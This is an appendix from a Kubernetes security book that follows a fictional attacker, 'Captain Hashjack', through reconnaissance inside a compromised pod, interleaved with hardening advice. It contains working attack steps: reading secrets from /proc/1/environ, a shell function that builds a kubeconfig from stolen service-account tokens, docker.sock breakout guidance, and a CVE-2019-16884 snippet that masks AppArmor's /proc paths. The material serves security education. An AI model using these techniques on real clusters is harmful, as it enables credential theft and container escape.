Appendix A. A Pod-Level Attack

This appendix is a hands-on exploration of attacks at the pod level, as we discussed in Chapter 2.


Dread cyberpirate Captain Hashjack can now execute code remotely inside a pod, and will start to explore its configuration to see what else can be accessed.

Like all good pirates, Captain Hashjack has a treasure map, but this is no ordinary map with a clearly defined destination. Instead, this map describes only the journey, with no guarantee of reaching a conclusion. It’s a cluster attack map, as shown in Figure A-1, and it is used to guide us through the rest of the appendix. And now, from inside the pod, it’s time to explore.

Tip

Securing any system is difficult. The best way to find vulnerabilities and misconfiguration is to methodically observe your environment, build up a library of your own attacks and patterns, and not give up!

Figure A-1. Pod attack map

Filesystem

Upon entering a new environment, a little basic checking may lead to useful discoveries. The first thing Hashjack does is check to see what kind of container they’re in. Checking /proc/self/cgroup often gives a clue, and here they can see they’re in Kubernetes from the clue /kubepods/besteffort/pod8a6fa26b-...:

adversary@hashjack-5ddf66bb7b-9sssx:/$ cat /proc/self/cgroup
11:memory:/kubepods/besteffort/pod8a6fa26b-.../f3d7b09d9c3a1ab10cf88b3956...
10:cpu,cpuacct:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b...
9:blkio:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b3956704...
8:net_cls,net_prio:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10c...
7:perf_event:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39...
6:freezer:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39567...
5:pids:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39567048...
4:cpuset:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b395670...
3:hugetlb:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39567...
2:devices:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b39567...
1:name=systemd:/kubepods/besteffort/pod8a6fa26b-...f3d7b09d9c3a1ab10cf88b...

Next, they might check the process's capabilities via its status entry in /proc/self/status:

Name:   cat
State:  R (running)
Tgid:   278
Ngid:   0
Pid:    278
PPid:   259
TracerPid:      0
Uid:    1001    1001    1001    1001
Gid:    0       0       0       0
FDSize: 256
Groups:
NStgid: 278
NSpid:  278
NSpgid: 278
NSsid:  259
VmPeak:     2432 kB
VmSize:     2432 kB
VmLck:         0 kB
VmPin:         0 kB
VmHWM:       752 kB
VmRSS:       752 kB
VmData:      312 kB
VmStk:       132 kB
VmExe:        28 kB
VmLib:      1424 kB
VmPTE:        24 kB
VmPMD:        12 kB
VmSwap:        0 kB
HugetlbPages:          0 kB
Threads:        1
SigQ:   0/15738
SigPnd: 0000000000000000
ShdPnd: 0000000000000000
SigBlk: 0000000000000000
SigIgn: 0000000000000000
SigCgt: 0000000000000000
CapInh: 00000000a80425fb
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000
Seccomp:        0
Speculation_Store_Bypass:       vulnerable
Cpus_allowed:   0003
Cpus_allowed_list:      0-1
Mems_allowed:   00000000,00000001
Mems_allowed_list:      0
voluntary_ctxt_switches:        0
nonvoluntary_ctxt_switches:     1

The kernel freely provides this information in order to help Linux applications, and an attacker in a container can use it to their advantage. Interesting entries can be grepped out (notice we’re root below):

root@hack:~ [0]$ grep -E \
  '(Uid|CoreDumping|Seccomp|NoNewPrivs|Cap[A-Za-z]+):' /proc/self/status
Uid:    0       0       0       0
CoreDumping:    0
CapInh: 0000003fffffffff
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
NoNewPrivs:     0
Seccomp:        0

The capabilities are not very readable, and need to be decoded:

root@hack:~ [0]$ capsh --decode=0000003fffffffff
0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,
  cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,
  cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,
  cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,
  cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,
  cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,
  cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,
  cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
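If capsh isn't available inside the container, the mask can be decoded by hand with shell arithmetic. Here's a minimal sketch; the bit numbers come from linux/capability.h (cap_net_raw is bit 13, cap_sys_admin is bit 21):

```shell
# cap_is_set MASK BIT: succeed if capability bit BIT is set in hex mask MASK
cap_is_set() {
  [ "$(( (0x$1 >> $2) & 1 ))" -eq 1 ]
}

# The default Docker capability set (a80425fb) includes cap_net_raw (13)
# but not cap_sys_admin (21)
cap_is_set 00000000a80425fb 13 && echo "cap_net_raw present"
cap_is_set 00000000a80425fb 21 || echo "cap_sys_admin absent"
```

A fully privileged container (mask 0000003fffffffff) sets every bit, including cap_sys_admin.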

You can also use the capsh --print command to show capabilities (if it’s installed), getpcaps and filecap (for a single process or file, respectively), pscap (for all running processes), and captest (for the current process’s context):

root@hack:~ [0]$ capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,
  cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,
  cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,
  cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,
  cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Ambient set =
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
 secure-no-ambient-raise: no (unlocked)
uid=0(root)
gid=0(root)
groups=1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)...

You may prefer to run Jess Frazelle’s amicontained, which runs these checks quickly and also handily detects capability, seccomp, and LSM configuration.

Let’s use amicontained:

root@hack:~ [0]$ export AMICONTAINED_SHA256="d8c49e2cf44ee9668219acd092e\
d961fc1aa420a6e036e0822d7a31033776c9f" 1

root@hack:~ [0]$ curl -fSL \ 2
  "https://github.com/genuinetools/amicontained/releases/download/v0.4.9/\
amicontained-linux-amd64" \
  -o "/tmp/amicontained" \
  && echo "${AMICONTAINED_SHA256}  /tmp/amicontained" | sha256sum -c - \
  && chmod a+x "/tmp/amicontained"



root@hack:~ [0]$ /tmp/amicontained 3
Container Runtime: kube
Has Namespaces:
        pid: true
        user: false
AppArmor Profile: docker-default (enforce)
Capabilities:
        BOUNDING -> chown dac_override fowner fsetid kill setgid setuid
  setpcap net_bind_service net_raw sys_chroot mknod audit_write setfcap
Seccomp: disabled
Blocked system calls (26):
        SYSLOG SETUID SETSID SETREUID SETGROUPS SETRESUID VHANGUP
  PIVOT_ROOT ACCT SETTIMEOFDAY UMOUNT2 SWAPON SWAPOFF REBOOT SETHOSTNAME
  SETDOMAINNAME INIT_MODULE DELETE_MODULE LOOKUP_DCOOKIE KEXEC_LOAD
  FUTIMESAT UTIMENSAT FANOTIFY_INIT OPEN_BY_HANDLE_AT FINIT_MODULE
  KEXEC_FILE_LOAD
Looking for Docker.sock
1. Export the sha256sum for verification.

2. Download the binary and check its sha256sum.

3. We installed to a nonstandard path to evade immutable filesystems, so we run the fully qualified path.

Jackpot! There’s a lot of information available about the security configuration of a container—from within it.

We can check our cgroup limits on the filesystem too:

root@hack:~ [0]$ free -m
        total   used   free   shared   buff/cache   available
Mem:     3950    334   1473        6         2142        3327
Swap:       0      0      0

free -m uses host-level APIs available to all processes, and is not cgroup-aware. Check the cgroup filesystem to see the process's actual limits:

root@host:~ [0]$ docker run -it --memory=4MB sublimino/hack \
  cat /sys/fs/cgroup/memory/memory.limit_in_bytes
4194304
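From inside the pod the same limit can be read directly from the cgroup filesystem. This sketch covers both the v1 and v2 layouts (on v2, a value of "max" means no limit is set):

```shell
# Print the effective memory limit; the path depends on the cgroup version
if [ -f /sys/fs/cgroup/memory/memory.limit_in_bytes ]; then
  cat /sys/fs/cgroup/memory/memory.limit_in_bytes   # cgroups v1
elif [ -f /sys/fs/cgroup/memory.max ]; then
  cat /sys/fs/cgroup/memory.max                     # cgroups v2
else
  echo "no memory cgroup controller found"
fi
```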

Is this tremendously useful to an attacker? Not really. Exhausting the memory of a process and causing denial of service is a basic attack (although fork bombs are elegantly scripted Bash poetry). Nevertheless, you should set cgroups to prevent DoS of applications in a container or pod (which support individual configuration). Cgroups are not a security boundary, and cgroups v1 can be escaped from a privileged pod, as nicely demonstrated in Figure A-2.

Figure A-2. Felix Wilhelm’s cleverly tweet-sized cgroups v1 container breakout
Tip

cgroups v2, which is more secure and a prerequisite for rootless containers, should be the default in most Linux distributions from 2022.

Denial of service is more likely to be an application fault than an attack. Serious DDoS (internet-based distributed denial of service) should be absorbed and mitigated by networking equipment in front of the cluster.

Note

In September 2017 Google fought off a 2.54 Tbps DDoS. This type of traffic is dropped by network router hardware at ingress to prevent it from overwhelming internal systems.

Kubernetes sets some useful environment variables into each container in a pod:

root@frontend:/frontend [0]$ env |
  grep -E '(KUBERNETES|[^_]SERVICE)_PORT=' | sort
ADSERVICE_PORT=tcp://10.3.253.186:9555
CARTSERVICE_PORT=tcp://10.3.251.123:7070
CHECKOUTSERVICE_PORT=tcp://10.3.240.26:5050
CURRENCYSERVICE_PORT=tcp://10.3.240.14:7000
EMAILSERVICE_PORT=tcp://10.3.242.14:5000
KUBERNETES_PORT=tcp://10.3.240.1:443
PAYMENTSERVICE_PORT=tcp://10.3.248.231:50051
PRODUCTCATALOGSERVICE_PORT=tcp://10.3.250.74:3550
RECOMMENDATIONSERVICE_PORT=tcp://10.3.254.65:8080
SHIPPINGSERVICE_PORT=tcp://10.3.242.42:50051

It is easy for an application to read its configuration from environment variables, and the 12 Factor App suggests that config and Secrets should be set in the environment. Environment variables are not a safe place to store Secrets as they can be read easily from the PID namespace by a process, user, or malicious code.

Tip

You can see a process’s environment as root, or the same user. Check PID 1 with a null-byte translation:

root@frontend:/frontend [0]$ tr '\0' '\n' < /proc/1/environ
HOSTNAME=9c7e824ed321
PWD=/
# ...

Even if no compromise takes place, many applications dump their environment when they crash, leaking Secrets to anyone who can access the logging system.

Kubernetes Secrets should not be mounted as environment variables.

Note

As well as being easy to collect from a parent process if an attacker has remote code execution, Kubernetes container environment variables are not updated after container creation: if the Secret is updated by the API server, the environment variable keeps the same value.

The safer option is to use a well-known path, and mount a Secret tmpfs volume into the container, so an adversary has to guess or find the Secret file path, which is less likely to be automated by an attacker. Mounted Secrets are updated automatically, after a kubelet sync period and cache propagation delay.

Here’s an example of a Secret mounted into the path /etc/foo:

apiVersion: v1
kind: Pod
metadata:
  name: mypod
spec:
  containers:
  - name: mypod
    image: redis
    volumeMounts:
    - name: foo
      mountPath: "/etc/foo"
      readOnly: true
  volumes:
  - name: foo
    secret:
      secretName: mysecret

Mounting Secrets as files protects against information leakage and ensures adversaries like Captain Hashjack don’t stumble across production secrets when diving through stolen application logs.

tmpfs

A fastidious explorer leaves no sea uncharted, and to Captain Hashjack attacking the filesystem is no different. Checking for anything external added to the mount namespace is the first port of call, for which common tools like mount and df can be used.

Let’s start with a search of the filesystem mount points for a common container filesystem driver, overlayfs. This may leak information about the type of container runtime that has configured the filesystem:

root@test-db-client-pod:~ [0]$ mount | grep overlay
overlay on / type overlay (rw,relatime,
  lowerdir=
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/316/fs:
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/315/fs:
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/314/fs:
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/313/fs:
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/312/fs:
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/311/fs:
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/310/fs:
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/309/fs:
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/308/fs,
  upperdir=
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/332/fs,
  workdir=
  /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/332/work)

We can see that the underlying container runtime is using a file path containing the name containerd, and the location of the container’s filesystem on the host disk is /var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/316/fs. There are multiple layered directories listed, and these are combined into a single filesystem at runtime by overlayfs.

These paths are fingerprints of the container runtime’s default configuration, and runc leaks its identity in the same way, with a different filesystem layout:

root@dbe6633a6c94:/# mount | grep overlay
overlay on / type overlay (rw,relatime,lowerdir=
  /var/lib/docker/overlay2/l/3PTJCBKLNC2V5MRAEF3AU6EDMS:
  /var/lib/docker/overlay2/l/SAJGPHO7UFXGYFRMGNJPUOXSQ5:
  /var/lib/docker/overlay2/l/4CZQ74RFDNSDSHQB6CTY6CLW7H,
  upperdir=
  /var/lib/docker/overlay2/aed7645f42335835a83f25ae7ab00b98595532224...163/diff,
  workdir=
  /var/lib/docker/overlay2/aed7645f42335835a83f25ae7ab00b98595532224...163/work)
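This fingerprinting can be scripted. The following sketch classifies the root overlay mount by the two runtimes' default state directories; anything mounted from nondefault paths will report unknown:

```shell
# Classify an overlay mount line by runtime-specific default paths
runtime_from_mount() {
  case "$1" in
    */var/lib/containerd/*) echo containerd ;;
    */var/lib/docker/*)     echo docker ;;
    *)                      echo unknown ;;
  esac
}

# Feed it the root filesystem's mount entry (empty outside an overlay-rooted
# container, which classifies as "unknown")
runtime_from_mount "$(grep ' / overlay ' /proc/mounts || true)"
```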

Run the df command to see if there are any Secrets mounted into the container. In this example no external entities are mounted into the container:

root@test-db-client-pod:~ [0]$ df
Filesystem     Type     Size  Used Avail Use% Mounted on
overlay        overlay   95G  6.6G   88G   7% /
tmpfs          tmpfs     64M     0   64M   0% /dev
tmpfs          tmpfs    7.1G     0  7.1G   0% /sys/fs/cgroup
/dev/sda1      ext4      95G  6.6G   88G   7% /etc/hosts
shm            tmpfs     64M     0   64M   0% /dev/shm
tmpfs          tmpfs    7.1G     0  7.1G   0% /proc/acpi
tmpfs          tmpfs    7.1G     0  7.1G   0% /proc/scsi
tmpfs          tmpfs    7.1G     0  7.1G   0% /sys/firmware

We can see that tmpfs is used for many different mounts, and some mounts are masking host filesystems in /proc and /sys. The container runtime performs additional masking on the special files in those directories.

Potentially interesting mounts in a vulnerable container filesystem may contain host-mounted Secrets and sockets, especially the infamous Docker socket, and Kubernetes service accounts that may have RBAC authorization to escalate privilege, or enable further attacks:

root@test-db-client-pod:~ [0]$ df
Filesystem  Type   ...  Use% Mounted on
tmpfs       tmpfs  ...    1% /etc/secret-volume
tmpfs       tmpfs  ...    1% /run/docker.sock
tmpfs       tmpfs  ...    1% /run/secrets/kubernetes.io/serviceaccount

The easiest and most convenient of all container breakouts is the /var/run/docker.sock mount point: the container runtime's socket, mounted from the host, which gives access to the Docker daemon running on the host and so the ability to start new containers. If those new containers are privileged, they can be used to trivially “escape” the container namespace and access the underlying host as root, as we saw previously.

Other appealing targets include the Kubernetes service account tokens under /var/run/secrets/kubernetes.io/serviceaccount, or writable host mounted directories like /etc/secret-volume. Any of these could lead to a breakout, or assist a pivot.

Everything a kubelet mounts into its containers is visible to the root user on the kubelet’s host. We’ll see what the serviceAccount mounted at /run/secrets/kubernetes.io/serviceaccount looks like later, and we investigated what to do with stolen serviceAccount credentials in Chapter 8.

From within a pod, kubectl uses the credentials in /run/secrets/kubernetes.io/serviceaccount by default. On the kubelet's host the same files are mounted under /var/lib/kubelet/pods/123e4567-e89b-12d3-a456-426614174000/volumes/kubernetes.io~secret/my-pod-token-7vzn2, so load the following function into a Bash shell:

kubectl-sa-dir () {
    # Directory containing the mounted service account (ca.crt, token)
    local DIR="${1:-}";
    local API_SERVER="${2:-kubernetes.default}";
    # Build a temporary kubeconfig context from the stolen credentials
    kubectl config set-cluster tmpk8s --server="https://${API_SERVER}" \
      --certificate-authority="${DIR}/ca.crt";
    kubectl config set-context tmpk8s --cluster=tmpk8s;
    kubectl config set-credentials tmpk8s --token="$(<${DIR}/token)";
    kubectl config set-context tmpk8s --user=tmpk8s;
    kubectl config use-context tmpk8s;
    # A request to a nonexistent namespace leaks the service account's
    # name in the "forbidden" error message
    kubectl get secrets -n null 2>&1 | sed -E 's,.*r "([^"]+).*,\1,g'
}

And run it against a directory:

root@kube-node-1:~ [0]# kubectl-sa-dir \
  /var/lib/kubelet/pods/.../kubernetes.io~secret/priv-app-r4zkx/...229622223/
Cluster "tmpk8s" set.
Context "tmpk8s" created.
User "tmpk8s" set.
Context "tmpk8s" modified.
Switched to context "tmpk8s".
apiVersion: v1
clusters:
- cluster:
    certificate-authority: \
        /var/lib/kubelet/pods/.../kubernetes.io~secret/.../...229622223/ca.crt
    server: https://10.0.1.1:6443
  name: tmpk8s
# ...
system:serviceaccount:kube-system:priv-app

You’re now able to use the system:serviceaccount:kube-system:priv-app service account (SA) more easily with kubectl as it’s configured in your ~/.kube/config. An attacker can do the same thing—hostile root access to Kubernetes nodes reveals all its Secrets!

Tip

CSI storage interfaces and host filesystem mounts both pose a security risk if others have access to them. We explore external storage, the Container Storage Interface (CSI), and other mounts in greater detail in Chapter 6.

What else is there mounted that might catch an adversary’s treasure-hungry gaze? Let’s explore further.

Host Mounts

The Kubernetes hostPath volume type mounts a filesystem path from the host into the container, which may be useful for some applications. /var/log is a popular mount point, so the host’s journal process collects container syslog events.

Warning

hostPath volumes should be avoided when possible as they present many risks. Best practice is to scope the mount to only the needed file or directory, and to use the readOnly mount flag.

Other use cases for hostPath mounts include persistence for datastores in the pod or hosting static data, libraries, and caches.
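For the log-collection use case mentioned above, a narrowly scoped, read-only hostPath mount might look like the following sketch (the pod, container, and volume names are illustrative):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: log-reader
spec:
  containers:
  - name: app
    image: busybox
    command: ["sh", "-c", "tail -f /host-logs/syslog"]
    volumeMounts:
    - name: host-logs
      mountPath: /host-logs
      readOnly: true        # container cannot write to the host path
  volumes:
  - name: host-logs
    hostPath:
      path: /var/log        # scope to the single directory needed
      type: Directory
```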

Using host disks or permanently attaching storage to a node creates a coupling between workloads and the underlying node, as the workloads must be restarted on that node in order to function properly. This makes scaling and resilience much more difficult.

Host mounts can be dangerous if a symlink is created inside the container that is unintentionally resolved on the host filesystem. This happened in CVE-2017-1002101, where a bug in the symbolic link handling code allowed an adversary inside a container to explore the host filesystem that the mounted volume was on.

Mounting sockets from the host into the container is also a popular hostPath use case, allowing a client inside the container to run commands against a server on the host. This is an easy path to container breakout: use the socket to start a new privileged container on the host, and escape through it.

Mounting sensitive directories or files from the host may also provide an opportunity to pivot if they can be used for network services.

hostPath volumes are writable on the host partition outside the container, and are always mounted on the host filesystem as owned by root:root. For this reason, a nonroot user should always be used inside the container, and filesystem permissions should be configured on the host if write access is needed inside the container.

Warning

If you are restricting hostPath access to specific directories with admission controllers, those volumeMounts must be readOnly, otherwise new symlinks can be used to traverse the host filesystem.

Ultimately data is the lifeblood of your business, and managing state is hard. An attacker will be looking to gather, exfiltrate, and cryptolock any data they can find in your systems. Consuming an external service (such as an object store or database hosted outside your cluster) to persist data is often the most resilient and scalable way to secure a system—however, for high-bandwidth or low-latency applications this may be impossible.

For everything else, cloud provider or internal service integrations remove the link between a workload and the underlying host, which makes scaling, upgrades, and system deployments much easier.

Hostile Containers

A hostile container is one that is under an attacker’s control. It may be created by an attacker with Kubernetes access (perhaps the kubelet, or API server), or a container image with automated exploit code embedded (for example, a “trojanized” image from dockerscan that can start a reverse shell in a legitimate container to give attackers access to your production systems), or have been accessed by a remote adversary post-deployment.

What about the filesystem of a hostile container image? If Captain Hashjack can force Kubernetes to run a container they have built or corrupted, they may try to attack the orchestrator, the container runtime, or clients (such as kubectl).

One attack (CVE-2019-16884) involves a container image that defines a VOLUME over a directory AppArmor uses for configuration, essentially disabling it at container runtime:

# Mask the /proc paths AppArmor uses to configure the container's profile
mkdir -p rootfs/proc/self/{attr,fd}
touch rootfs/proc/self/{status,attr/exec}
touch rootfs/proc/self/fd/{4,5}

This may be used as part of a further attack on the system, but as AppArmor is unlikely to be the only layer of defense, it is not as serious as it may appear.

Another dangerous container image is one used by a /proc/self/exe breakout in CVE-2019-5736. This exploit requires a container with a maliciously linked ENTRYPOINT, so it can't be run in a container that has already started.

As these attacks show, unless a container is built from trusted components, it should be considered untrusted, in order to defend against further unknown attacks such as these.

Caution

A collection of kubectl cp CVEs (CVE-2018-1002100, CVE-2019-11249) require a malicious tar binary inside the container. The vulnerability stems from kubectl trusting the input it receives from the scp and tar process inside the container, which can be manipulated to overwrite files on the machine the kubectl binary is being run on.

Runtime

The danger of the /proc/self/exe breakout in CVE-2019-5736 is that a hostile container process can overwrite the runc binary on the host. That runc binary is owned by root, but as it is also executed by root on the host (as most container runtimes need some root capabilities), it can be overwritten from inside the container in this attack. This is because the container process is a child of runc, and this exploit uses the permission runc has to overwrite itself.

The root user has many special privileges as a result of years of kernel development that assumed only one “root” user. To limit the impact of RCE to the container, pod, and host, applications inside a container should not be run as root, and their capabilities should be dropped, without the ability to gain privileges by setting the allowPrivilegeEscalation securityContext field to false (which sets the no_new_privs flag on the container process).